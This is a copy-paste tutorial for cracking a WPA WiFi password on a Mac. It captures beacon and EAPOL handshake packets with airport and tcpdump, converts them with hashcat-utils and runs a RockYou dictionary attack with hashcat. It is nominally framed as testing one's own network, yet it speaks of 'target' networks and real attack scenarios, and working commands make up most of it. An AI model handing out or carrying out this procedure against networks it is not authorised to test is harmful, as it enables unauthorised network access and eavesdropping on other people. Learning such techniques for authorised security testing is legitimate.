Here we will walk you through every step of the attack, explaining some of the technologies as we go. Make sure you have completed the necessary installations page before you do this!
IMPORTANT: Any time one of the steps on this page prompts you to enter a password, enter the password used to unlock your computer, and then hit enter (your password will not appear in the terminal as you type so do not worry about that).
All steps should execute instantly unless noted otherwise.
Additionally, make sure that you go through these instructions in order, as commands usually depend on the output of previous commands.
Open Terminal.
First, we are going to download a wordlist that we will use later on. The wordlist, called RockYou.txt
, is a list of 1.4 million common passwords. We will use this list to try and crack the password hash later in the attack. To download and unzip the file, copy and paste this command into Terminal (note: after every command that you copy and paste, be sure to hit enter so that it runs):
wget https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz?raw=true -O rockyou.txt.gz && gunzip rockyou.txt.gz
The output should look similar to this, but not necessarily identical as your environment may look different than ours. It is important to look for a "100%" somewhere in the terminal.
Execution Time: Less than one minute
Our goal is now to learn the name of the network router. We will do this by using a library called airport. airport will allow us to both determine the network name and mac address.
MAC address: (Media Access Control address), is a unique identifier used to identify devices on a network
In Terminal, copy and paste this command to allow the airport binary to be recognized:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
If prompted, enter your password and hit enter.
Determine the name of the WiFi network that you are trying to attack. A list of WiFi names can be found by clicking on the WiFi button in the upper right-hand corner of your home screen. For our example, we will be attacking the “MySpectrumWifi4B-5G” network.
Now we will use Mac’s network listening abilities to get some more information about our target network. In Terminal, copy and paste this command:
sudo airport -s
The output should look something like the figure above. If no networks were found, repeat the previous step.
Execution Time: Instant
We now need to find the actual name of the network router. The name of the network router is what we need to impersonate the router. All login attempts need to be handled by the router, so when a new person logs into the WiFi their request will be sent to that name. We then want to intercept that encrypted login request that the user sends; this will likely be a encrypted password.
From the output of the previous step, find the BSSID of the target network. It should look like the BSSID outlined in red in the screenshot below:
This BSSID is the Mac Address (the unique identifier) of the WiFi router. We are going to save the BSSID in an environment variable that we will use later. To do this, copy and paste this command:
export BSSID=<TARGET_MAC_ADDRESS>
In our example, we would run:
export BSSID=78:29:ed:27:07:4a
Verification
If the above command worked, you should be able to now run:
echo $BSSID
And see something like the below:
Execution Time: Instant
This step will only work if someone is trying to connect to the network. Either one needs to wait for someone else to make a login attempt on the network, or one could simulate a login attempt by disconnecting and reconnecting their phone to the network.
Now we are going to use airport
to disassociate from all networks. This will disconnect you from WiFi, so make sure not to close out of this guide before you are done or you will not be able to access it. To dissociate, run:
sudo airport -z
Next, we will use airport
to tell our machine to listen on the channel that our target network is using. First identify the channel from the output of the first step of the previous section Set Environment Variables:
Execution Time: Instant
Now that we have identified our target network, we will use airport to start eavesdropping on that network. To do this, run:
sudo airport -c<target_channel>
In our example, we would run:
sudo airport -c36
Now we will begin collecting packets. To do this we are going to use tcpdump
, a network packet analyzer. We are going to listen for a packet, and then save that packet to a file called beacon.cap
. Run:
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap
This command should complete fairly quickly, as long as there are people using the target network [4]. Look for the packet captured line:
Execution Time: Less than one minute if people are actively using the network.
Once the last command is complete, we are going to start listening for any authentication packets. These packets get sent whenever someone re-authenticates to a network. (This happens any time someone goes from being not connected to the WiFi to being connected.) To listen for these packets, run:
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
This will not complete immediately, so wait and move on to the next step. When the above command does terminate, it will save the authentication packet in a file called handshake.cap
. Within this file will be the hash of the WiFi password that we will try to crack [7].
Execution Time: See Step 7
In order to make the last command terminate, we need to figure out a way to get someone to connect to the network. This is where it gets fun. In a real attack scenario, the attacker would just wait until someone entered the house. When doing this on your own home, you can think of creative scenarios to convince your friends to disconnect and then reconnect to the WiFi. Or, if you want to be boring and you have a device that is connected to the target network, you can just turn the WiFi off on the device, then turn it back on, and wait for the device to reconnect to the target network. When the terminal output changes from Got 0
to another number greater than zero, such as Got 4
in the screenshot below, there have been sufficient packets captured.
Once the terminal says that packets have been captured, you can kill the process by going to your terminal and pressing the control key, often abbreviated to "Ctrl", and the "C" key at the same time.
Note: At this point you are free to reconnect to WiFi.
Execution Time: This command will not terminate until someone successfully authenticates to the target network.
Now we have to merge the two capture files into one file called capture.cap. To do that run:
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
We must transfer capture.cap
into a format that our cracking tool hashcat
can use to crack the password hash. To do this, we have to install one last tool. We will install, compile, and run the tool using this command:
git clone https://github.com/hashcat/hashcat-utils.git && cd hashcat-utils/src && make && cd ../../ && hashcat-utils/src/cap2hccapx.bin capture.cap capture.hccapx
There will be a lot of text printed to the terminal, but the last few lines should look like this:
Note that if you already had a hashcat-utils folder in the working directory, this step may not work. in that case, run the previous command starting from the "cd hashcat-utils..." section.
Execution Time: Less than two minutes.
Make sure that there was at least one WPA Handshake written to capture.hccapx
as is shown in the screenshot above. If there was not, then go back to the sudo tcpdump
step of Start Listening and try again. If this still does not work, cascade up the tutorial and confirm your ability to successfully complete and confirm the outputs of Wait for Reconnection and Collect Packets. If the problem persists, it may be that your WiFi authentication scheme is not vulnerable to this attack.
Once we have the hash file, we are going to try and crack it using hashcat
. A hash is just an encrypted password. We are going to go through the entire list of 1.4 million passwords that we downloaded earlier, encrypt them, and then see if they match the hash that we captured. If they match, then we have cracked the WiFi password [8]! To begin this process, run:
hashcat -m 2500 capture.hccapx rockyou.txt
This process could take up to five minutes (remember, it is trying 1.4 Million passwords). If successful, the result will look like this:
Now all that is left to do is to retrieve the password! Finally, run:
hashcat -m 2500 capture.hccapx rockyou.txt --show
You should now have the decrypted password, as shown in the screenshot above.
Execution Time: Five to ten minutes.
On my network, the password was rewardbarrel058
(don’t worry, I changed it immediately after this example).
If the password attack was not successful, congratulations! You at least have a decently secure password. Keep in mind, however,mthat we only used 1.4 Million passwords. A dedicated cracking rig could run through over a billion attempts in a very short amount of time.
You can also add your password to the wordlist and re-run the last few steps to see what it would be like if the steps did work. To do that, run echo <your_password> >> rockyou.txt
where <your_password>
is the password of your target network. This command adds your password to the end of the rockyou.txt
file, thus adding the password to the wordlist. For example, if rewardbarrel058
was not on rockyou.txt
, we would add it by running:
echo rewardbarrel058 >> rockyou.txt
Now go back and follow the tutorial from Cracking The Hash, and the password hash should get cracked!